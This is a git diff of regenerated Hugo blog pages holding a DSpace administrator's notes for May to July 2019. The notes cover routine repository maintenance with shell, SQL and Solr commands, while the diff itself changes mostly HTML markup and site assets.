$ ./delete-metadata-values.py -i /tmp/2019-05-17-delete-14-Investors.csv -db dspace -u dspace -p &#39;fuuu&#39; -m 29 -f dc.description.sponsorship -d
</code></pre><ul>
<li>Then I re-exported the sponsors and took the top 100 to update the existing controlled vocabulary (<a href="https://github.com/ilri/DSpace/pull/423">#423</a>)
<ul>
@ -564,7 +564,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-05-17-delete-14-Investors.csv -db dsp
</li>
<li>Generate Simple Archive Format bundle with SAFBuilder and import into the <a href="https://cgspace.cgiar.org/handle/10568/101106">AfricaRice Articles in Journals</a> collection on CGSpace:</li>
</ul>
<pre><code>$ dspace import -a -e me@cgiar.org -m 2019-05-25-AfricaRice.map -s /tmp/SimpleArchiveFormat
<pre tabindex="0"><code>$ dspace import -a -e me@cgiar.org -m 2019-05-25-AfricaRice.map -s /tmp/SimpleArchiveFormat
</code></pre><h2 id="2019-05-27">2019-05-27</h2>
<ul>
<li>Peter sent me over two thousand corrections for the authors on CGSpace that I had dumped last month
@ -573,16 +573,16 @@ $ ./delete-metadata-values.py -i /tmp/2019-05-17-delete-14-Investors.csv -db dsp
</ul>
</li>
</ul>
<pre><code>$ ./fix-metadata-values.py -i /tmp/2019-05-27-fix-2472-Authors.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -m 3 -t corrections -d
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2019-05-27-fix-2472-Authors.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.contributor.author -m 3 -t corrections -d
</code></pre><ul>
<li>Then start a full Discovery re-indexing on each server:</li>
</ul>
<pre><code>$ export JAVA_OPTS=&quot;-Dfile.encoding=UTF-8 -Xmx1024m&quot;
<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx1024m&#34;
$ time schedtool -B -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
</code></pre><ul>
<li>Export new list of all authors from CGSpace database to send to Peter:</li>
</ul>
<pre><code>dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 group by text_value order by count desc) to /tmp/2019-05-27-all-authors.csv with csv header;
<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;contributor&#39; and qualifier = &#39;author&#39;) AND resource_type_id = 2 group by text_value order by count desc) to /tmp/2019-05-27-all-authors.csv with csv header;
COPY 64871
</code></pre><ul>
<li>Run all system updates on DSpace Test (linode19) and reboot it</li>
@ -605,11 +605,11 @@ COPY 64871
<ul>
<li>I see the following error in the DSpace log when the user tries to log in with her CGIAR email and password on the LDAP login:</li>
</ul>
<pre><code>2019-05-30 07:19:35,166 INFO org.dspace.authenticate.LDAPAuthentication @ anonymous:session_id=A5E0C836AF8F3ABB769FE47107AE1CFF:ip_addr=185.71.4.34:failed_login:no DN found for user sa.saini@cgiar.org
<pre tabindex="0"><code>2019-05-30 07:19:35,166 INFO org.dspace.authenticate.LDAPAuthentication @ anonymous:session_id=A5E0C836AF8F3ABB769FE47107AE1CFF:ip_addr=185.71.4.34:failed_login:no DN found for user sa.saini@cgiar.org
</code></pre><ul>
<li>For now I just created an eperson with her personal email address until I have time to check LDAP to see what&rsquo;s up with her CGIAR account:</li>
</ul>
<pre><code>$ dspace user -a -m blah@blah.com -g Sakshi -s Saini -p 'sknflksnfksnfdls'
<pre tabindex="0"><code>$ dspace user -a -m blah@blah.com -g Sakshi -s Saini -p &#39;sknflksnfksnfdls&#39;
</code></pre><!-- raw HTML omitted -->
@ -631,15 +631,15 @@ COPY 64871
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2021-08/">August, 2021</a></li>
<li><a href="/cgspace-notes/2025-01/">January, 2025</a></li>
<li><a href="/cgspace-notes/2021-07/">July, 2021</a></li>
<li><a href="/cgspace-notes/2024-12/">December, 2024</a></li>
<li><a href="/cgspace-notes/2021-06/">June, 2021</a></li>
<li><a href="/cgspace-notes/2024-11/">November, 2024</a></li>
<li><a href="/cgspace-notes/2021-05/">May, 2021</a></li>
<li><a href="/cgspace-notes/2024-10/">October, 2024</a></li>
<li><a href="/cgspace-notes/2021-04/">April, 2021</a></li>
<li><a href="/cgspace-notes/2024-09/">September, 2024</a></li>
</ol>
</section>

View File

@ -34,7 +34,7 @@ Run system updates on CGSpace (linode18) and reboot it
Skype with Marie-Angélique and Abenet about CG Core v2
"/>
<meta name="generator" content="Hugo 0.87.0" />
<meta name="generator" content="Hugo 0.133.1">
@ -64,12 +64,12 @@ Skype with Marie-Angélique and Abenet about CG Core v2
<!-- combined, minified CSS -->
<link href="https://alanorth.github.io/cgspace-notes/css/style.beb8012edc08ba10be012f079d618dc243812267efe62e11f22fe49618f976a4.css" rel="stylesheet" integrity="sha256-vrgBLtwIuhC&#43;AS8HnWGNwkOBImfv5i4R8i/klhj5dqQ=" crossorigin="anonymous">
<link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
<!-- minified Font Awesome for SVG icons -->
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.ffbfea088a9a1666ec65c3a8cb4906e2a0e4f92dc70dbbf400a125ad2422123a.js" integrity="sha256-/7/qCIqaFmbsZcOoy0kG4qDk&#43;S3HDbv0AKElrSQiEjo=" crossorigin="anonymous"></script>
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
<!-- RSS 2.0 feed -->
@ -115,7 +115,7 @@ Skype with Marie-Angélique and Abenet about CG Core v2
<p class="blog-post-meta">
<time datetime="2019-06-02T10:57:51+03:00">Sun Jun 02, 2019</time>
in
<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/cgspace-notes/categories/notes/" rel="category tag">Notes</a>
<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
</p>
@ -169,7 +169,7 @@ Skype with Marie-Angélique and Abenet about CG Core v2
<ul>
<li>Thierry noticed that the CUA statistics were missing previous years again, and I see that the Solr admin UI has the following message:</li>
</ul>
<pre><code>statistics-2018: org.apache.solr.common.SolrException:org.apache.solr.common.SolrException: Error opening new searcher
<pre tabindex="0"><code>statistics-2018: org.apache.solr.common.SolrException:org.apache.solr.common.SolrException: Error opening new searcher
</code></pre><ul>
<li>I had to restart Tomcat a few times for all the stats cores to get loaded with no issue</li>
</ul>
@ -197,13 +197,13 @@ Skype with Marie-Angélique and Abenet about CG Core v2
</ul>
</li>
</ul>
<pre><code>dspace=# \COPY (SELECT DISTINCT text_value, count(*) FROM metadatavalue WHERE metadata_field_id = 228 AND resource_type_id = 2 GROUP BY text_value ORDER BY count DESC) to /tmp/countries.csv WITH CSV HEADER
<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value, count(*) FROM metadatavalue WHERE metadata_field_id = 228 AND resource_type_id = 2 GROUP BY text_value ORDER BY count DESC) to /tmp/countries.csv WITH CSV HEADER
COPY 192
$ csvcut -l -c 0 /tmp/countries.csv &gt; 2019-06-10-countries.csv
</code></pre><ul>
<li>Get a list of all the unique AGROVOC subject terms in IITA&rsquo;s data and export it to a text file so I can validate them with my <code>agrovoc-lookup.py</code> script:</li>
</ul>
<pre><code>$ csvcut -c dc.subject ~/Downloads/2019-06-10-IITA-20194th-Round-2.csv| sed 's/||/\n/g' | grep -v dc.subject | sort -u &gt; iita-agrovoc.txt
<pre tabindex="0"><code>$ csvcut -c dc.subject ~/Downloads/2019-06-10-IITA-20194th-Round-2.csv| sed &#39;s/||/\n/g&#39; | grep -v dc.subject | sort -u &gt; iita-agrovoc.txt
$ ./agrovoc-lookup.py -i iita-agrovoc.txt -om iita-agrovoc-matches.txt -or iita-agrovoc-rejects.txt
$ wc -l iita-agrovoc*
402 iita-agrovoc-matches.txt
@ -212,11 +212,11 @@ $ wc -l iita-agrovoc*
</code></pre><ul>
<li>Combine these IITA matches with the subjects I matched a few months ago:</li>
</ul>
<pre><code>$ csvcut -c name 2019-03-18-subjects-matched.csv | grep -v name | cat - iita-agrovoc-matches.txt | sort -u &gt; 2019-06-10-subjects-matched.txt
<pre tabindex="0"><code>$ csvcut -c name 2019-03-18-subjects-matched.csv | grep -v name | cat - iita-agrovoc-matches.txt | sort -u &gt; 2019-06-10-subjects-matched.txt
</code></pre><ul>
<li>Then make a new list to use with reconcile-csv by adding line numbers with csvcut and changing the line number header to <code>id</code>:</li>
</ul>
<pre><code>$ csvcut -c name -l 2019-06-10-subjects-matched.txt | sed 's/line_number/id/' &gt; 2019-06-10-subjects-matched.csv
<pre tabindex="0"><code>$ csvcut -c name -l 2019-06-10-subjects-matched.txt | sed &#39;s/line_number/id/&#39; &gt; 2019-06-10-subjects-matched.csv
</code></pre><h2 id="2019-06-20">2019-06-20</h2>
<ul>
<li>Share some feedback about AReS v2 with the colleagues and encourage them to do the same</li>
@ -231,18 +231,18 @@ $ wc -l iita-agrovoc*
</li>
<li>Update my local PostgreSQL container:</li>
</ul>
<pre><code>$ podman pull docker.io/library/postgres:9.6-alpine
<pre tabindex="0"><code>$ podman pull docker.io/library/postgres:9.6-alpine
$ podman rm dspacedb
$ podman run --name dspacedb -v dspacedb_data:/var/lib/postgresql/data -e POSTGRES_PASSWORD=postgres -p 5432:5432 -d postgres:9.6-alpine
</code></pre><h2 id="2019-06-25">2019-06-25</h2>
<ul>
<li>Normalize <code>text_lang</code> values for metadata on DSpace Test and CGSpace:</li>
</ul>
<pre><code>dspace=# UPDATE metadatavalue SET text_lang='en_US' WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IN ('ethnob', 'en', '*', 'E.', '');
<pre tabindex="0"><code>dspace=# UPDATE metadatavalue SET text_lang=&#39;en_US&#39; WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IN (&#39;ethnob&#39;, &#39;en&#39;, &#39;*&#39;, &#39;E.&#39;, &#39;&#39;);
UPDATE 1551
dspace=# UPDATE metadatavalue SET text_lang='en_US' WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IS NULL;
dspace=# UPDATE metadatavalue SET text_lang=&#39;en_US&#39; WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IS NULL;
UPDATE 2070
dspace=# UPDATE metadatavalue SET text_lang='es_ES' WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IN ('es', 'spa');
dspace=# UPDATE metadatavalue SET text_lang=&#39;es_ES&#39; WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IN (&#39;es&#39;, &#39;spa&#39;);
UPDATE 2
</code></pre><ul>
<li>Upload 202 IITA records from earlier this month (20194th.xls) to CGSpace</li>
@ -291,7 +291,7 @@ UPDATE 2
</ul>
</li>
</ul>
<pre><code>$ dspace import -a -e me@cgiar.org -m 2019-06-30-AfricaRice-11to73.map -s /tmp/2019-06-30-AfricaRice-11to73
<pre tabindex="0"><code>$ dspace import -a -e me@cgiar.org -m 2019-06-30-AfricaRice-11to73.map -s /tmp/2019-06-30-AfricaRice-11to73
</code></pre><ul>
<li>I sent feedback about a few missing PDFs and one duplicate to Ibnou to check</li>
<li>Run all system updates on DSpace Test (linode19) and reboot it</li>
@ -317,15 +317,15 @@ UPDATE 2
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2021-08/">August, 2021</a></li>
<li><a href="/cgspace-notes/2025-01/">January, 2025</a></li>
<li><a href="/cgspace-notes/2021-07/">July, 2021</a></li>
<li><a href="/cgspace-notes/2024-12/">December, 2024</a></li>
<li><a href="/cgspace-notes/2021-06/">June, 2021</a></li>
<li><a href="/cgspace-notes/2024-11/">November, 2024</a></li>
<li><a href="/cgspace-notes/2021-05/">May, 2021</a></li>
<li><a href="/cgspace-notes/2024-10/">October, 2024</a></li>
<li><a href="/cgspace-notes/2021-04/">April, 2021</a></li>
<li><a href="/cgspace-notes/2024-09/">September, 2024</a></li>
</ol>
</section>

View File

@ -21,7 +21,7 @@ Abenet had another similar issue a few days ago when trying to find the stats fo
<meta property="og:type" content="article" />
<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2019-07/" />
<meta property="article:published_time" content="2019-07-01T12:13:51+03:00" />
<meta property="article:modified_time" content="2019-10-28T13:39:25+02:00" />
<meta property="article:modified_time" content="2023-08-14T10:39:08+02:00" />
@ -38,7 +38,7 @@ CGSpace
Abenet had another similar issue a few days ago when trying to find the stats for 2018 in the RTB community
"/>
<meta name="generator" content="Hugo 0.87.0" />
<meta name="generator" content="Hugo 0.133.1">
@ -50,7 +50,7 @@ Abenet had another similar issue a few days ago when trying to find the stats fo
"url": "https://alanorth.github.io/cgspace-notes/2019-07/",
"wordCount": "2330",
"datePublished": "2019-07-01T12:13:51+03:00",
"dateModified": "2019-10-28T13:39:25+02:00",
"dateModified": "2023-08-14T10:39:08+02:00",
"author": {
"@type": "Person",
"name": "Alan Orth"
@ -68,12 +68,12 @@ Abenet had another similar issue a few days ago when trying to find the stats fo
<!-- combined, minified CSS -->
<link href="https://alanorth.github.io/cgspace-notes/css/style.beb8012edc08ba10be012f079d618dc243812267efe62e11f22fe49618f976a4.css" rel="stylesheet" integrity="sha256-vrgBLtwIuhC&#43;AS8HnWGNwkOBImfv5i4R8i/klhj5dqQ=" crossorigin="anonymous">
<link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
<!-- minified Font Awesome for SVG icons -->
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.ffbfea088a9a1666ec65c3a8cb4906e2a0e4f92dc70dbbf400a125ad2422123a.js" integrity="sha256-/7/qCIqaFmbsZcOoy0kG4qDk&#43;S3HDbv0AKElrSQiEjo=" crossorigin="anonymous"></script>
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
<!-- RSS 2.0 feed -->
@ -119,7 +119,7 @@ Abenet had another similar issue a few days ago when trying to find the stats fo
<p class="blog-post-meta">
<time datetime="2019-07-01T12:13:51+03:00">Mon Jul 01, 2019</time>
in
<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/cgspace-notes/categories/notes/" rel="category tag">Notes</a>
<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
</p>
@ -153,13 +153,13 @@ Abenet had another similar issue a few days ago when trying to find the stats fo
</ul>
</li>
</ul>
<pre><code>org.apache.solr.common.SolrException: Error CREATEing SolrCore 'statistics-2010': Unable to create core [statistics-2010] Caused by: Lock obtain timed out: NativeFSLock@/home/cgspace.cgiar.org/solr/statistics-2010/data/index/write.lock
<pre tabindex="0"><code>org.apache.solr.common.SolrException: Error CREATEing SolrCore &#39;statistics-2010&#39;: Unable to create core [statistics-2010] Caused by: Lock obtain timed out: NativeFSLock@/home/cgspace.cgiar.org/solr/statistics-2010/data/index/write.lock
</code></pre><ul>
<li>I restarted Tomcat <em>ten times</em> and it never worked&hellip;</li>
<li>I tried to stop Tomcat and delete the write locks:</li>
</ul>
<pre><code># systemctl stop tomcat7
# find /dspace/solr/statistics* -iname &quot;*.lock&quot; -print -delete
<pre tabindex="0"><code># systemctl stop tomcat7
# find /dspace/solr/statistics* -iname &#34;*.lock&#34; -print -delete
/dspace/solr/statistics/data/index/write.lock
/dspace/solr/statistics-2010/data/index/write.lock
/dspace/solr/statistics-2011/data/index/write.lock
@ -170,29 +170,29 @@ Abenet had another similar issue a few days ago when trying to find the stats fo
/dspace/solr/statistics-2016/data/index/write.lock
/dspace/solr/statistics-2017/data/index/write.lock
/dspace/solr/statistics-2018/data/index/write.lock
# find /dspace/solr/statistics* -iname &quot;*.lock&quot; -print -delete
# find /dspace/solr/statistics* -iname &#34;*.lock&#34; -print -delete
# systemctl start tomcat7
</code></pre><ul>
<li>But it still didn&rsquo;t work!</li>
<li>I stopped Tomcat, deleted the old locks, and will try to use the &ldquo;simple&rdquo; lock file type in <code>solr/statistics/conf/solrconfig.xml</code>:</li>
</ul>
<pre><code>&lt;lockType&gt;${solr.lock.type:simple}&lt;/lockType&gt;
<pre tabindex="0"><code>&lt;lockType&gt;${solr.lock.type:simple}&lt;/lockType&gt;
</code></pre><ul>
<li>And after restarting Tomcat it still doesn&rsquo;t work</li>
<li>Now I&rsquo;ll try going back to &ldquo;native&rdquo; locking with <code>unlockOnStartup</code>:</li>
</ul>
<pre><code>&lt;unlockOnStartup&gt;true&lt;/unlockOnStartup&gt;
<pre tabindex="0"><code>&lt;unlockOnStartup&gt;true&lt;/unlockOnStartup&gt;
</code></pre><ul>
<li>Now the cores seem to load, but I still see an error in the Solr Admin UI and I still can&rsquo;t access any stats before 2018</li>
<li>I filed an <a href="https://tracker.atmire.com/tickets-cgiar-ilri/view-ticket?id=685">issue with Atmire</a>, so let&rsquo;s see if they can help</li>
<li>And since I&rsquo;m annoyed and it&rsquo;s been a few months, I&rsquo;m going to move the JVM heap settings that I&rsquo;ve been testing on DSpace Test to CGSpace</li>
<li>The old ones were:</li>
</ul>
<pre><code>-Djava.awt.headless=true -Xms8192m -Xmx8192m -XX:+UseConcMarkSweepGC -Dfile.encoding=UTF-8 -Dcom.sun.management.jmxremote -Dcom.sun.management.jmxremote.port=5400 -Dcom.sun.management.jmxremote.ssl=false -Dcom.sun.management.jmxremote.authenticate=false
<pre tabindex="0"><code>-Djava.awt.headless=true -Xms8192m -Xmx8192m -XX:+UseConcMarkSweepGC -Dfile.encoding=UTF-8 -Dcom.sun.management.jmxremote -Dcom.sun.management.jmxremote.port=5400 -Dcom.sun.management.jmxremote.ssl=false -Dcom.sun.management.jmxremote.authenticate=false
</code></pre><ul>
<li>And the new ones come from Solr 4.10.x&rsquo;s startup scripts:</li>
</ul>
<pre><code> -Djava.awt.headless=true
<pre tabindex="0"><code> -Djava.awt.headless=true
-Xms8192m -Xmx8192m
-Dfile.encoding=UTF-8
-XX:NewRatio=3
@ -221,14 +221,14 @@ Abenet had another similar issue a few days ago when trying to find the stats fo
</ul>
</li>
</ul>
<pre><code>$ sed -i 's/CC-BY 4.0/CC-BY-4.0/' item_*/dublin_core.xml
$ echo &quot;10568/101992&quot; &gt;&gt; item_*/collections
<pre tabindex="0"><code>$ sed -i &#39;s/CC-BY 4.0/CC-BY-4.0/&#39; item_*/dublin_core.xml
$ echo &#34;10568/101992&#34; &gt;&gt; item_*/collections
$ dspace import -a -e me@cgiar.org -m 2019-07-02-Sharefair.map -s /tmp/Sharefair_mapped
</code></pre><ul>
<li>I noticed that all twenty-seven items had double dates like &ldquo;2019-05||2019-05&rdquo; so I fixed those, but the rest of the metadata looked good so I unmapped them from the temporary collection</li>
<li>Finish looking at the fifty-six AfricaRice items and upload them to CGSpace:</li>
</ul>
<pre><code>$ dspace import -a -e me@cgiar.org -m 2019-07-02-AfricaRice-11to73.map -s /tmp/SimpleArchiveFormat
<pre tabindex="0"><code>$ dspace import -a -e me@cgiar.org -m 2019-07-02-AfricaRice-11to73.map -s /tmp/SimpleArchiveFormat
</code></pre><ul>
<li>Peter pointed out that the Sharefair dates I fixed were not actually fixed
<ul>
@ -249,20 +249,20 @@ $ dspace import -a -e me@cgiar.org -m 2019-07-02-Sharefair.map -s /tmp/Sharefair
</ul>
</li>
</ul>
<pre><code>$ cat dspace/config/controlled-vocabularies/cg-creator-id.xml /tmp/new-bioversity-orcids.txt | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort -u &gt; /tmp/2019-07-04-orcid-ids.txt
<pre tabindex="0"><code>$ cat dspace/config/controlled-vocabularies/cg-creator-id.xml /tmp/new-bioversity-orcids.txt | grep -oE &#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39; | sort -u &gt; /tmp/2019-07-04-orcid-ids.txt
$ ./resolve-orcids.py -i /tmp/2019-07-04-orcid-ids.txt -o 2019-07-04-orcid-names.txt -d
</code></pre><ul>
<li>Send and merge a pull request for the new ORCID identifiers (<a href="https://github.com/ilri/DSpace/pull/428">#428</a>)</li>
<li>I created a CSV with some ORCID identifiers that I had seen change so I could update any existing ones in the database:</li>
</ul>
<pre><code>cg.creator.id,correct
&quot;Marius Ekué: 0000-0002-5829-6321&quot;,&quot;Marius R.M. Ekué: 0000-0002-5829-6321&quot;
&quot;Mwungu: 0000-0001-6181-8445&quot;,&quot;Chris Miyinzi Mwungu: 0000-0001-6181-8445&quot;
&quot;Mwungu: 0000-0003-1658-287X&quot;,&quot;Chris Miyinzi Mwungu: 0000-0003-1658-287X&quot;
<pre tabindex="0"><code>cg.creator.id,correct
&#34;Marius Ekué: 0000-0002-5829-6321&#34;,&#34;Marius R.M. Ekué: 0000-0002-5829-6321&#34;
&#34;Mwungu: 0000-0001-6181-8445&#34;,&#34;Chris Miyinzi Mwungu: 0000-0001-6181-8445&#34;
&#34;Mwungu: 0000-0003-1658-287X&#34;,&#34;Chris Miyinzi Mwungu: 0000-0003-1658-287X&#34;
</code></pre><ul>
<li>But when I ran <code>fix-metadata-values.py</code> I didn&rsquo;t see any changes:</li>
</ul>
<pre><code>$ ./fix-metadata-values.py -i 2019-07-04-update-orcids.csv -db dspace -u dspace -p 'fuuu' -f cg.creator.id -m 240 -t correct -d
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i 2019-07-04-update-orcids.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.creator.id -m 240 -t correct -d
</code></pre><h2 id="2019-07-06">2019-07-06</h2>
<ul>
<li>Send a reminder to Marie about my notes on the <a href="https://github.com/AgriculturalSemantics/cg-core/issues/2">CG Core v2 issue I created two weeks ago</a></li>
@ -282,22 +282,22 @@ $ ./resolve-orcids.py -i /tmp/2019-07-04-orcid-ids.txt -o 2019-07-04-orcid-names
</li>
<li>Playing with the idea of using <a href="https://github.com/BurntSushi/xsv">xsv</a> to do some basic batch quality checks on CSVs, for example to find items that might be duplicates if they have the same DOI or title:</li>
</ul>
<pre><code>$ xsv frequency --select cg.identifier.doi --no-nulls cgspace_metadata_africaRice-11to73_ay_id.csv | grep -v -E ',1'
<pre tabindex="0"><code>$ xsv frequency --select cg.identifier.doi --no-nulls cgspace_metadata_africaRice-11to73_ay_id.csv | grep -v -E &#39;,1&#39;
field,value,count
cg.identifier.doi,https://doi.org/10.1016/j.agwat.2018.06.018,2
$ xsv frequency --select dc.title --no-nulls cgspace_metadata_africaRice-11to73_ay_id.csv | grep -v -E ',1'
$ xsv frequency --select dc.title --no-nulls cgspace_metadata_africaRice-11to73_ay_id.csv | grep -v -E &#39;,1&#39;
field,value,count
dc.title,Reference evapotranspiration prediction using hybridized fuzzy model with firefly algorithm: Regional case study in Burkina Faso,2
</code></pre><ul>
<li>Or perhaps if DOIs are valid or not (having doi.org in the URL):</li>
</ul>
<pre><code>$ xsv frequency --select cg.identifier.doi --no-nulls cgspace_metadata_africaRice-11to73_ay_id.csv | grep -v -E 'doi.org'
<pre tabindex="0"><code>$ xsv frequency --select cg.identifier.doi --no-nulls cgspace_metadata_africaRice-11to73_ay_id.csv | grep -v -E &#39;doi.org&#39;
field,value,count
cg.identifier.doi,https://hdl.handle.net/10520/EJC-1236ac700f,1
</code></pre><ul>
<li>Or perhaps items with invalid ISSNs (according to the <a href="https://en.wikipedia.org/wiki/International_Standard_Serial_Number#Code_format">ISSN code format</a>):</li>
</ul>
<pre><code>$ xsv select dc.identifier.issn cgspace_metadata_africaRice-11to73_ay_id.csv | grep -v '&quot;' | grep -v -E '^[0-9]{4}-[0-9]{3}[0-9xX]$'
<pre tabindex="0"><code>$ xsv select dc.identifier.issn cgspace_metadata_africaRice-11to73_ay_id.csv | grep -v &#39;&#34;&#39; | grep -v -E &#39;^[0-9]{4}-[0-9]{3}[0-9xX]$&#39;
dc.identifier.issn
978-3-319-71997-9
978-3-319-71997-9
@ -330,10 +330,10 @@ dc.identifier.issn
<li>Also, Jane asked me to check the Data Portal to see which email address requests for confidential data are going to</li>
</ul>
</li>
<li>Yesterday Theirry from CTA asked me about an error he was getting while submitting an item on CGSpace: &ldquo;Unable to load Submission Information, since WorkspaceID (ID:S106658) is not a valid in-process submission.&rdquo;</li>
<li>Yesterday Thierry from CTA asked me about an error he was getting while submitting an item on CGSpace: &ldquo;Unable to load Submission Information, since WorkspaceID (ID:S106658) is not a valid in-process submission.&rdquo;</li>
<li>I looked in the DSpace logs and found this right around the time of the screenshot he sent me:</li>
</ul>
<pre><code>2019-07-10 11:50:27,433 INFO org.dspace.submit.step.CompleteStep @ lewyllie@cta.int:session_id=A920730003BCAECE8A3B31DCDE11A97E:submission_complete:Completed submission with id=106658
<pre tabindex="0"><code>2019-07-10 11:50:27,433 INFO org.dspace.submit.step.CompleteStep @ lewyllie@cta.int:session_id=A920730003BCAECE8A3B31DCDE11A97E:submission_complete:Completed submission with id=106658
</code></pre><ul>
<li>I&rsquo;m assuming something happened in his browser (like a refresh) after the item was submitted&hellip;</li>
</ul>
@ -350,30 +350,30 @@ dc.identifier.issn
<li>Run all system updates on DSpace Test (linode19) and reboot it</li>
<li>Try to run <code>dspace cleanup -v</code> on CGSpace and ran into an error:</li>
</ul>
<pre><code>Error: ERROR: update or delete on table &quot;bitstream&quot; violates foreign key constraint &quot;bundle_primary_bitstream_id_fkey&quot; on table &quot;bundle&quot;
Detail: Key (bitstream_id)=(167394) is still referenced from table &quot;bundle&quot;.
<pre tabindex="0"><code>Error: ERROR: update or delete on table &#34;bitstream&#34; violates foreign key constraint &#34;bundle_primary_bitstream_id_fkey&#34; on table &#34;bundle&#34;
Detail: Key (bitstream_id)=(167394) is still referenced from table &#34;bundle&#34;.
</code></pre><ul>
<li>The solution is, as always:</li>
</ul>
<pre><code># su - postgres
$ psql dspace -c 'update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (167394);'
<pre tabindex="0"><code># su - postgres
$ psql dspace -c &#39;update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (167394);&#39;
UPDATE 1
</code></pre><h2 id="2019-07-16">2019-07-16</h2>
<ul>
<li>Completely reset the Podman configuration on my laptop because there were some layers that I couldn&rsquo;t delete and it had been some time since I did a cleanup:</li>
</ul>
<pre><code>$ podman system prune -a -f --volumes
<pre tabindex="0"><code>$ podman system prune -a -f --volumes
$ sudo rm -rf ~/.local/share/containers
</code></pre><ul>
<li>Then pull a new PostgreSQL 9.6 image and load a CGSpace database dump into a new local test container:</li>
</ul>
<pre><code>$ podman pull postgres:9.6-alpine
<pre tabindex="0"><code>$ podman pull postgres:9.6-alpine
$ podman run --name dspacedb -v dspacedb_data:/var/lib/postgresql/data -e POSTGRES_PASSWORD=postgres -p 5432:5432 -d postgres:9.6-alpine
$ createuser -h localhost -U postgres --pwprompt dspacetest
$ createdb -h localhost -U postgres -O dspacetest --encoding=UNICODE dspacetest
$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest superuser;'
$ psql -h localhost -U postgres dspacetest -c &#39;alter user dspacetest superuser;&#39;
$ pg_restore -h localhost -U postgres -d dspacetest -O --role=dspacetest -h localhost ~/Downloads/cgspace_2019-07-16.backup
$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest nosuperuser;'
$ psql -h localhost -U postgres dspacetest -c &#39;alter user dspacetest nosuperuser;&#39;
$ psql -h localhost -U postgres -f ~/src/git/DSpace/dspace/etc/postgres/update-sequences.sql dspacetest
</code></pre><ul>
<li>Start working on implementing the <a href="https://gist.github.com/alanorth/2db39e91f48d116e00a4edffd6ba6409">CG Core v2 changes</a> on my local DSpace test environment</li>
@ -388,7 +388,7 @@ $ psql -h localhost -U postgres -f ~/src/git/DSpace/dspace/etc/postgres/update-s
</li>
<li>Sisay said a user was having problems registering on CGSpace and it looks like the email account expired again:</li>
</ul>
<pre><code>$ dspace test-email
<pre tabindex="0"><code>$ dspace test-email
About to send test email:
- To: blahh@cgiar.org
@ -414,7 +414,7 @@ Please see the DSpace documentation for assistance.
<ul>
<li>Create an account for Lionelle Samnick on CGSpace because the registration isn&rsquo;t working for some reason:</li>
</ul>
<pre><code>$ dspace user --add --givenname Lionelle --surname Samnick --email blah@blah.com --password 'blah'
<pre tabindex="0"><code>$ dspace user --add --givenname Lionelle --surname Samnick --email blah@blah.com --password &#39;blah&#39;
</code></pre><ul>
<li>I added her as a submitter to <a href="https://cgspace.cgiar.org/handle/10568/74536">CTA ISF Pro-Agro series</a></li>
<li>Start looking at 1429 records for the Bioversity batch import
@ -442,7 +442,7 @@ Please see the DSpace documentation for assistance.
</ul>
</li>
</ul>
<pre><code> &lt;dct:coverage&gt;
<pre tabindex="0"><code> &lt;dct:coverage&gt;
&lt;dct:spatial&gt;
&lt;type&gt;Country&lt;/type&gt;
&lt;dct:identifier&gt;http://sws.geonames.org/192950&lt;/dct:identifier&gt;
